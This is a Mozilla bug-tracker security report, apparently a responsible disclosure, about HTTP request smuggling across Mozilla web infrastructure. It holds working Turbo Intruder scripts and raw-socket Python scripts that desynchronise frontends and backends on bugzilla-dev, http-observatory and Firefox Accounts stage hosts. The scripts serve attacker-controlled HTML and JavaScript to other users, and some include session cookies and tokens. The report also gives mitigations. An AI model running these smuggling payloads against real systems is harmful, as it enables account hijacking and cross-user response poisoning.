HTTP Request Smuggling across Mozilla web infrastructure
Categories
(Websites :: Other, task)
Tracking
(Not tracked)
People
(Reporter: albinowax, Unassigned)
References
Details
(Keywords: reporter-external, sec-high, wsec-http-header-inject, Whiteboard: please talk to claudijd before unhiding)
Attachments
(4 files)
Hi,
The technique used in this report is part of ongoing research pending publication at Black Hat in August. Please don't share or publish it in the meantime. In particular, please don't make this bug public without my consent like you did with my last report.
I've found that a substantial portion of Mozilla's web infrastructure is vulnerable to HTTP request smuggling. This can typically be used by attackers to hijack arbitrary user accounts with zero user interaction - it's roughly equivalent to persistent XSS on every page.
This vulnerability occurs because the backend servers regard
Foo: bar\nTransfer-Encoding: chunked
as two separate headers, whereas the frontends regard it as one header and therefore use the content-length header instead. This means it's possible to send an ambiguous request which gets interpreted differently by each of the two servers and desynchronizes them, leading to TCP socket poisoning.
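To make the parsing discrepancy concrete, here's a minimal, self-contained sketch. These are not the real frontend/backend parsers - just two toy header parsers modelling the two interpretations of a bare "\n" inside the header block:

```python
# Toy illustration of the CL.TE discrepancy described above. The only
# difference between the two "servers" is what they treat as a line ending.

raw_headers = (b'POST / HTTP/1.1\r\n'
               b'Foo: bar\n'                      # bare \n, not \r\n
               b'Transfer-Encoding: chunked\r\n'
               b'Content-Length: 6\r\n')

def frontend_view(block):
    # Frontend-style: only \r\n terminates a header line, so the bare \n
    # stays inside the value of "Foo" and Transfer-Encoding is never seen.
    lines = block.split(b'\r\n')
    return [l.split(b':', 1)[0] for l in lines[1:] if l]

def backend_view(block):
    # Backend-style: both \n and \r\n terminate a header line,
    # so Transfer-Encoding emerges as its own header.
    lines = block.splitlines()
    return [l.split(b':', 1)[0] for l in lines[1:] if l]

print(frontend_view(raw_headers))  # no Transfer-Encoding -> uses Content-Length
print(backend_view(raw_headers))   # sees Transfer-Encoding -> uses chunked
```

With the frontend using Content-Length and the backend using chunked encoding, the two servers disagree about where the request ends - which is exactly the desynchronization described above.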
A cursory scan indicates that this issue potentially affects the following domains:
bugzilla.mozilla.org, support.mozilla.org, addons.mozilla.org, thimble.mozilla.org, science.mozilla.org, discourse.mozilla.org, donate.mozilla.org, download.mozilla.org, crash-stats.mozilla.org, sql.telemetry.mozilla.org, http-observatory.security.mozilla.org, symbolapi.mozilla.org, click.e.mozilla.org, symbols.mozilla.org, missioncontrol.telemetry.mozilla.org, learning.mozilla.org, elmo.services.mozilla.com, crash-stats.mozilla.com, webextensions.settings.services.mozilla.com, phabricator.services.mozilla.com, testpilot.r53-2.mozilla.com, testpilot.settings.services.mozilla.com, color.r53-2.services.mozilla.com, search.r53-2.services.mozilla.com
For obvious reasons I haven't bothered to try and exploit every one of these services. Instead, I've focused on bugzilla.mozilla.org as an example critical target.
To avoid affecting real users we'll target bugzilla-dev.allizom.org. To easily replicate the core issue, run the following script in Turbo Intruder:
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint='https://bugzilla-dev.allizom.org:443',
                           concurrentConnections=5,
                           requestsPerConnection=1,
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0
                           )
    engine.start()

    attack = '''POST /home HTTP/1.1
Fooz: bar
Transfer-Encoding: chunked
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Foo: bar

0

GET /robots.txt HTTP/1.1
X-Ignore: X'''
    engine.queue(attack)

    victim = '''POST /index.cgi HTTP/1.1
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://bugzilla-dev.allizom.org/home
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Connection: close
Cookie: Bugzilla_login_request_cookie=2lcwXqRJq6; github_secret=faEb99ZsQriC3xBH1PETUck6KZWTmly7DxnsqRJperIpet9H6zGyGX7d4kMddULJJO5cA9hVfulDOL1Zajv9u1Ap7COolDpPUVeJafOyqRWDq6eyyFAneUwYoHjey2h2f4fTqFhiBcs5NZVCoJgerziuRqc1UfrZe6vzee30mMCeU2K3FShhgZWtK8qgzRHfGX0E3DksxPLyevRuNVSiLNfSPJTEiFDSyc31EInyHF4GShmpUCQD99pLGkr4PIZE
Upgrade-Insecure-Requests: 1

Bugzilla_login=test%40example.com&Bugzilla_password=cow&Bugzilla_remember=on&Bugzilla_login_token=&GoAheadAndLogIn=Log+in'''
    for i in range(14):
        engine.queue(victim)
        time.sleep(0.1)

def handleResponse(req, interesting):
    table.add(req)
You should observe that one of the 'victim' login requests gets the robots.txt response, thanks to the smuggled request inside the attack. This response will potentially get served up to any active user.
By amending the smuggled request, the attacker can make the response content originate from a malicious bug attachment, and effectively gain the ability to serve malicious HTML/JavaScript to everyone using the application. This is quite fiddly - I'll provide the steps in a followup comment.
Updated•6 years ago
Reporter
Comment 1•6 years ago
Here's a script I successfully used to demonstrate causing an arbitrary response:
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint='https://bugzilla-dev.allizom.org:443',
                           concurrentConnections=5,
                           requestsPerConnection=1,
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0
                           )
    engine.start()

    attack = '''POST /home HTTP/1.1
Fooz: bar
Transfer-Encoding: chunked
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Bugzilla_login=454982; Bugzilla_logincookie=Ix3NYbZBCJ1YPtzvxi24s9; VERSION-Firefox=1.5.0.x%20Branch
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 767
Foo: bar

0

POST /attachment.cgi?id=9155360&t=zUM7YAZi5WW38hKjoYI8D8 HTTP/1.1
Host: bug1395564.bmoattachments.bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://bugzilla-dev.allizom.org/show_bug.cgi?id=1395564
X-Forwarded-Host: cow.com
X-Requested-With: XMLHttpRequest
X-Forwarded-For: 81.139.39.150
X-Forwarded-Port: 443
X-Forwarded-Proto: https
Connection: close
Cookie: Bugzilla_login=454982; Bugzilla_logincookie=Ix3NYbZBCJ1YPtzvxi24s9; VERSION-Firefox=1.5.0.x%20Branch
Content-Type: application/x-www-form-urlencoded
Content-Length: 740

Bugzilla_api_token=hkvtOvKDAeEDu5txHfUPBo&text=foobar'''

    victim = '''POST /home HTTP/1.1
Fooz: bar
Transfer-Encoding: chunked
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Bugzilla_login=454982; Bugzilla_logincookie=Ix3NYbZBCJ1YPtzvxi24s9; VERSION-Firefox=1.5.0.x%20Branch
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Foo: bar

0

'''

    # The request engine will auto-fix the content-length for us
    attack = target.req + prefix
    engine.queue(attack)
    victim = target.req
    for i in range(14):
        engine.queue(victim)
        time.sleep(0.05)

def handleResponse(req, interesting):
    table.add(req)
You should see that one victim POST request to bugzilla-dev.allizom.org gets the contents of the attachment. To make this PoC work for you, you'll need to create a bug, create a malicious attachment, and update the URL and Host header in the smuggled request to contain your attachment ID, bug ID, and attachment token. Please note that the attachment token is either single use or expires very quickly.
Reporter
Comment 2•6 years ago
There are a few ways to resolve this issue:
- Make the frontend system normalise requests (I think nginx does a pretty good job at this)
- Make the frontend reject requests containing '\n' in a header value.
- Make the backend reject chunked requests that contain a Content-Length header (and close the connection afterwards)
- Disable connection-reuse between the front-end and backend (this may have a serious performance impact)
- Exclusively use HTTP/2 between the front-end and backend
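For the third option, here's a minimal sketch of the check a backend could apply before processing a request. This is a hypothetical helper, not any specific server's code; it flags both the TE+CL combination and newlines embedded in header values:

```python
def is_ambiguous(headers):
    """Return True if a parsed request carries both Transfer-Encoding and
    Content-Length, or a newline embedded in any header value - either of
    which should trigger a reject plus connection close.

    `headers` is a list of (name, value) pairs, as produced by a parser.
    """
    names = {name.strip().lower() for name, _ in headers}
    if 'transfer-encoding' in names and 'content-length' in names:
        return True
    # A \r or \n inside a value means the request was header-smuggled
    # past a parser with laxer line-ending rules.
    return any('\n' in value or '\r' in value for _, value in headers)

# An ambiguous request like the one in this report:
assert is_ambiguous([('Foo', 'bar\nTransfer-Encoding: chunked'),
                     ('Content-Length', '43')])
# A normal request passes:
assert not is_ambiguous([('Host', 'example.org'), ('Content-Length', '0')])
```

The important operational detail is the second half of the mitigation: after rejecting such a request, the connection must be closed, otherwise the unread bytes still poison the reused socket.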
Comment 3•6 years ago
It seems to me that the root of the problem is that the frontend follows RFC 2616 (CRLF as the header delimiter) but the backend does not.
Are there open bugs with any HTTP serving software and libraries about this?
Reporter
Comment 4•6 years ago
I don't know about open bugs, but here are some related fixed issues in Pound: https://regilero.github.io/english/security/2018/07/03/security_pound_http_smuggling/
Comment 5•6 years ago
Note this is related to bug 1546698.
Or rather, bug 1546698 exists because of the same underlying problem.
Comment 6•6 years ago
Hi James, I'm having problems reproducing this with your scripts.
The first one seems to return the same responses every time, without the contents of robots.txt, and the second one fails:
Error launching attack - bad python?
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "<string>", line 70, in queueRequests
NameError: global name 'prefix' is not defined
    at org.python.core.Py.NameError(Py.java:284)
    at org.python.core.PyFrame.getglobal(PyFrame.java:265)
Any suggestions?
thanks
Comment 7•6 years ago
Hah, I submitted the exact same comment at the exact same time as Simon. I am also having the same problem.
Reporter
Comment 8•6 years ago
You're right, the PoC script is busted. Sorry, I'll have to get it fixed on Monday. That's what I get for rushing to have the report ready by the end of the week.
Reporter
Comment 9•6 years ago
*Tuesday; it's a bank holiday Monday. Sorry!
Comment 10•6 years ago
(In reply to James Kettle from comment #2)
There's a few ways to resolve this issue:
- Make the backend reject chunked requests that contain a Content-Length header (and close the connection afterwards)
The backend forbids this combination, but it is being added by either the ELB or nginx.
Comment 11•6 years ago
No problem, we'll put things on hold for now. You said that it potentially affects http-observatory.security.mozilla.org - if you'd be able to replicate there, that would make things a lot easier than on BMO (which has a lot of moving pieces).
The API is documented at https://github.com/mozilla/http-observatory/blob/master/httpobs/docs/api.md, but some really simple endpoints to use are:
https://http-observatory.security.mozilla.org/__version__
https://http-observatory.security.mozilla.org/contribute.json
https://http-observatory.security.mozilla.org/__lbheartbeat__
Thanks!
Comment 12•6 years ago
Is it possible that this is an outgrowth of the already-known bad behavior of ELBs with respect to chunked encoding?
"If the client cancels an HTTP request that was initiated with a Transfer-Encoding: chunked header, there is a known issue where the load balancer forwards the request to the instance even though the client canceled the request. This can cause backend errors."
https://docs.aws.amazon.com/elasticloadbalancing/latest/classic/ts-elb-http-errors.html
Comment 13•6 years ago
This is really weird.
I added Content-Length to bugzilla-dev.allizom.org (not all requests set a length before this change)
But then I don't see that content length, I see 4245.
So I added X-Bugzilla-Content-Length.
Now I see two flavors of responses:
X-Bugzilla-Content-Length: 13213
transfer-encoding: chunked
and
X-Bugzilla-Content-Length: 13213
Content-Length: 4245
What does 4245 mean? Where does it come from?
Comment 14•6 years ago
These are the headers before they get sent to nginx or the ELB
Comment 15•6 years ago
variant 1 of the mangled headers
Comment 16•6 years ago
Comment 17•6 years ago
Comment 18•6 years ago
These examples suggest to me that gzip is at fault.
I wager 4245 is what 13213 compresses to.
I further wager the randomness is related to load: if the gzip takes slightly longer, nginx does chunked?
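The compression half of this hypothesis is easy to sanity-check in isolation. The real 13213-byte response body isn't available here, so a repetitive HTML stand-in is used and the exact compressed size will differ from the observed 4245:

```python
import gzip

# Stand-in for the real 13213-byte response body; repeated markup is a
# rough approximation of how well HTML compresses.
body = (b'<html><body><p>hello bugzilla</p></body></html>' * 300)[:13213]
compressed = gzip.compress(body)

# With "Content-Encoding: gzip", the on-the-wire Content-Length would be
# the compressed size, not the original 13213.
print(len(body), '->', len(compressed))
```

If the ELB sometimes buffers the compressed response (and can set Content-Length to the compressed size) and sometimes streams it (falling back to chunked), that would explain seeing both response flavors.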
Comment 19•6 years ago
OK: nginx itself is removing the Content-Length in all cases. Sometimes the ELB is adding it back.
With the request
GET / HTTP/1.1
User-Agent: curl/7.29.0
Accept: */*
Accept-Encoding: gzip
Host: bugzilla-dev.allizom.org
X-Forwarded-Proto: https
X-Forwarded-For: 127.0.0.1
The response is always
HTTP/1.1 200 OK
Date: Fri, 24 May 2019 23:32:05 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: public, max-age=3600, immutable
Strict-Transport-Security: max-age=31536000; includeSubDomains
Referrer-policy: same-origin
X-frame-options: SAMEORIGIN
X-xss-protection: 1; mode=block
X-content-type-options: nosniff
Content-Security-Policy: default-src 'self'; worker-src 'none'; connect-src 'self' https://product-details.mozilla.org https://www.google-analytics.com https://treeherder.mozilla.org/api/failurecount/ https://crash-stats.mozilla.org/api/SuperSearch/; font-src 'self' https://fonts.gstatic.com; img-src 'self' data: blob: https://secure.gravatar.com; object-src 'none'; script-src 'self' 'nonce-CBHl7aif3p5ilARJOlccPjrZlTTnBL1gOlysLrUUimpe0RrN' 'unsafe-inline' https://www.google-analytics.com; style-src 'self' 'unsafe-inline'; frame-src https://crash-stop-addon.herokuapp.com; frame-ancestors 'self'; form-action 'self' https://www.google.com/search https://github.com/login/oauth/authorize https://github.com/login
Content-Encoding: gzip
I'm not certain why the ELB sometimes adds a Content-length, but when it does -- that seems to be when things get confused.
Comment 20•6 years ago
Until we can make the ELBs not be dumb, I think we should turn off gzip compression.
Reporter
Comment 21•6 years ago
OK, here's a PoC script that actually works. It issues two victim requests, followed by an attack request, followed by two more victim requests. All the victim requests are identical, but you should be able to observe that the attack changes the response to one of the victim requests from the expected JSON to the HTML homepage.
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint='https://bugzilla-dev.allizom.org:443',
                           concurrentConnections=1,
                           requestsPerConnection=1,
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0
                           )
    engine.start()

    attack = '''POST /home HTTP/1.1
Fooz: bar'''+'\n'+'''Transfer-Encoding: chunked
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Foo: bar

0

GET / HTTP/1.1
X-Ignore: X'''

    victim = '''POST /rest/bug_user_last_visit/1395564?Bugzilla_api_token=U7E8I7xDuUdWDC3GOku5dh HTTP/1.1
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://bugzilla-dev.allizom.org/show_bug.cgi?id=1395564
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: VERSION-Firefox=1.5.0.x%20Branch; Bugzilla_login=454982; Bugzilla_logincookie=Ix3NYbZBCJ1YPtzvxi24s9
Content-Length: 0

'''

    engine.queue(victim)
    engine.queue(victim)
    engine.queue(attack)
    engine.queue(victim)
    engine.queue(victim)

def handleResponse(req, interesting):
    table.add(req)
Reporter
Comment 22•6 years ago
And here's the attack script that demonstrates causing an arbitrary HTML response. The key thing about this response is that it gets served from https://bugzilla-dev.allizom.org/ so that's where the browser thinks it comes from, even though it really originates from bug1395570.bmoattachments.bugzilla-dev.allizom.org
I've switched to using an attachment on a public bug so you don't need to edit it yourself:
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint='https://bugzilla-dev.allizom.org:443',
                           concurrentConnections=1,
                           requestsPerConnection=1,
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0
                           )
    engine.start()

    attack = '''POST /home HTTP/1.1
Fooz: bar'''+'\n'+'''Transfer-Encoding: chunked
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Foo: bar

0

POST /attachment.cgi?id=9155367 HTTP/1.1
Host: bug1395570.bmoattachments.bugzilla-dev.allizom.org
X-Forwarded-For: 81.139.39.150
X-Forwarded-Port: 443
X-Forwarded-Proto: https
Referer: https://bugzilla-dev.allizom.org/show_bug.cgi?id=1395564
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

foo=bar&x='''

    victim = '''POST /rest/bug_user_last_visit/1395564?Bugzilla_api_token=U7E8I7xDuUdWDC3GOku5dh HTTP/1.1
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://bugzilla-dev.allizom.org/show_bug.cgi?id=1395564
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: VERSION-Firefox=1.5.0.x%20Branch; Bugzilla_login=454982; Bugzilla_logincookie=Ix3NYbZBCJ1YPtzvxi24s9
Content-Length: 0

'''

    engine.queue(victim)
    engine.queue(victim)
    engine.queue(attack)
    engine.queue(victim)
    engine.queue(victim)

def handleResponse(req, interesting):
    table.add(req)
Comment 23•6 years ago
Thanks James,
I can confirm that when running this script I can see '<script>alert(document.domain)</script>' in the first victim response after the attack request.
Reporter
Comment 24•6 years ago
As requested, here's another script demonstrating the same issue on http-observatory.security.mozilla.org. Hope that makes life easier for you:
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint='https://http-observatory.security.mozilla.org:443',
                           concurrentConnections=1,
                           requestsPerConnection=1,
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0
                           )
    engine.start()

    attack = '''POST / HTTP/1.1
Fooz: bar'''+'\n'+'''Transfer-Encoding: chunked
Host: http-observatory.security.mozilla.org
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Foo: bar

0

GET /__version__ HTTP/1.1
X-Ignore: X'''

    victim = '''GET / HTTP/1.1
Host: http-observatory.security.mozilla.org
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

'''

    engine.queue(attack)
    for i in range(14):
        engine.queue(victim)
        time.sleep(0.05)

def handleResponse(req, interesting):
    table.add(req)
Comment 25•6 years ago
I've been trying to reproduce this issue against https://api.accounts.firefox.com, and while I haven't been able to reproduce the "response poisoning" effect shown on other properties above, I've seen enough to be concerned.
The FxA backend servers are all arranged like [ELB] -> [nginx] -> [nodejs app]. I don't have access to prod or stage, but went onto one of our development boxes and ran the following script directly against nginx:
import socket

# This is where nginx listens for requests from the ELB.
sock = socket.create_connection(("localhost", 1443))
sock.sendall(
    #
    # An initial request, checking status of an account that
    # does exist. It should respond with `{"exists": true}`.
    # Note that the "Fooz" header ends with "\n"
    # rather than "\r\n", but nginx will accept that as a
    # separate header. It will ignore the Content-Length header
    # and process this as a chunked encoding request body.
    #
    b'POST /auth/v1/account/status HTTP/1.1\r\n'
    b'Fooz: Bar\n'
    b'Transfer-Encoding: chunked\r\n'
    b'Host: latest.dev.lcip.org\r\n'
    b'Content-Type: text/json\r\n'
    b'Connection: keep-alive\r\n'
    b'Content-Length: 305\r\n'
    b'\r\n'
    b'1A\r\n'
    b'{"email":"ryan@rfk.id.au"}\r\n'
    b'0\r\n'
    b'\r\n'
    #
    # A second request, pipelined over the same socket.
    # This one is pretty ordinary and well-formed, and
    # is for an account that does not exist. It should
    # respond with `{"exists": false}`.
    #
    b'POST /auth/v1/account/status HTTP/1.1\r\n'
    b'Host: latest.dev.lcip.org\r\n'
    b'Connection: keep-alive\r\n'
    b'Content-Type: text/json\r\n'
    b'Content-Length: 26\r\n'
    b'\r\n'
    b'{"email":"jeff@rfk.id.au"}'
    #
    # A third request, again checking an account that does exist.
    # There's nothing unusual about this one. It should respond
    # with `{"exists": true}`.
    #
    b'POST /auth/v1/account/status HTTP/1.1\r\n'
    b'Host: latest.dev.lcip.org\r\n'
    b'Connection: close\r\n'
    b'Content-Type: text/json\r\n'
    b'Content-Length: 26\r\n'
    b'\r\n'
    b'{"email":"ryan@rfk.id.au"}'
)
print(sock.recv(4096))
print(sock.recv(4096))
print(sock.recv(4096))
Nginx interpreted this sequence of bytes as three separate requests, forwarding each to the app and returning three correct responses of {"exists": true}, {"exists": false}, and {"exists": true}. It would be better if it returned an error about the missing \r in the first request, but this is apparently allowed by the HTTP/1.1 spec.
Next I tried a similar sequence of bytes against the ELB in our stage environment. I don't have good visibility into exactly what's happening inside the ELB, but here's the script I used and my annotations about why it's being weird based on the description from this bug report:
import socket
import ssl

context = ssl.create_default_context()
host = "api-accounts.stage.mozaws.net"
sock = socket.create_connection((host, 443))
sock = context.wrap_socket(sock, server_hostname=host)
sock.sendall(
    #
    # An initial request, checking status of an account that
    # does exist. It should respond with `{"exists": true}`.
    #
    # Note that the "Fooz" header ends with "\n" rather than "\r\n".
    # The ELB will not recognize this as a header terminator, and will
    # instead treat these two lines as a single header:
    #
    #   "Fooz" -> "Bar\nTransfer-Encoding: chunked"
    #
    b'POST /v1/account/status HTTP/1.1\r\n'
    b'Fooz: Bar\n'
    b'Transfer-Encoding: chunked\r\n'    # <-- The ELB doesn't see this header.
    b'Host: api-accounts.stage.mozaws.net\r\n'
    b'Content-Type: text/json\r\n'
    b'Connection: keep-alive\r\n'
    b'Content-Length: 205\r\n'           # <-- So the ELB reads this content length
    b'\r\n'                              #     and thinks all this is one big request...
    b'1A\r\n'                            # <---------------------------------------+
    b'{"email":"ryan@rfk.id.au"}\r\n'
    b'0\r\n'
    b'\r\n'
    #
    # A second request, pipelined over the same socket.
    # This one is pretty ordinary and well-formed, and
    # is for an account that does not exist. It should
    # respond with `{"exists": false}`.
    #
    b'POST /v1/account/status HTTP/1.1\r\n'
    b'Host: api-accounts.stage.mozaws.net\r\n'
    b'Connection: keep-alive\r\n'
    b'Content-Type: text/json\r\n'
    b'Content-Length: 26\r\n'
    b'\r\n'                              # ...all the way down to here!
    b'{"email":"jeff@rfk.id.au"}'        # <---------------------------------------+
    #
    # A third request, again checking an account that does exist.
    # There's nothing unusual about this one. It should respond
    # with `{"exists": true}`.
    #
    b'POST /v1/account/status HTTP/1.1\r\n'
    b'Host: api-accounts.stage.mozaws.net\r\n'
    b'Connection: close\r\n'
    b'Content-Type: text/json\r\n'
    b'Content-Length: 26\r\n'
    b'\r\n'
    b'{"email":"ryan@rfk.id.au"}'
)
print(sock.recv(4096))
print(sock.recv(4096))
print(sock.recv(4096))
If you execute this script, it will behave as though it made two requests to the application, returning two responses of {"exists": true} and {"exists": true}. The middle request, the one that's supposed to return {"exists": false}, has completely vanished!
You can confirm that it's the ELB that is behaving incorrectly here by:
- Adjusting the "Fooz" header to end in a proper \r\n sequence. This will cause the bytes to be interpreted as three proper requests, just like nginx does in the previous test.
- Adjusting the first "Content-Length" header to be something other than "205". This will cause the script to return two responses, one successful and the second a 400 Bad Request, presumably because the ELB truncates the bytes at a place that makes for an unintelligible request through to nginx.
So the big question for me is....what happened to the bytes from that middle request? The ELB slurped them off the wire, but did it forward them to nginx and through to the app? Did the app return the expected response, and if so where did it go? :jbuck, perhaps you could try running the above script against stage, and monitor the nginx logs to see whether it is indeed getting through to the app as three separate well-formed requests?
If the ELB could be tricked into returning those response bytes to some other user, a variety of Very Bad Things would be possible. Given the successful response poisoning from Comment 22 and friends, I have to assume this would be possible on FxA as well, unless we can prove otherwise.
Reporter
Comment 26•6 years ago
I think you already know this but just so nobody is taken by surprise: I'm going to publicly disclose the BMO vulnerability on August 7th.
It would be great if it was patched by then.
Reporter
Comment 27•6 years ago
This vulnerability has now been disclosed here: https://portswigger.net/blog/http-desync-attacks-request-smuggling-reborn
Comment 28•6 years ago
James: Thanks again for your report and your excellent research here. To the best of my understanding Amazon has applied a global fix to this issue. I'm closing this issue as resolved, and if there are other spot corner cases that come up, we can deal with those in separate bugs.
Comment 29•6 years ago
James: We've awarded a bounty on this report, you'll hear from us shortly with details. Thanks again!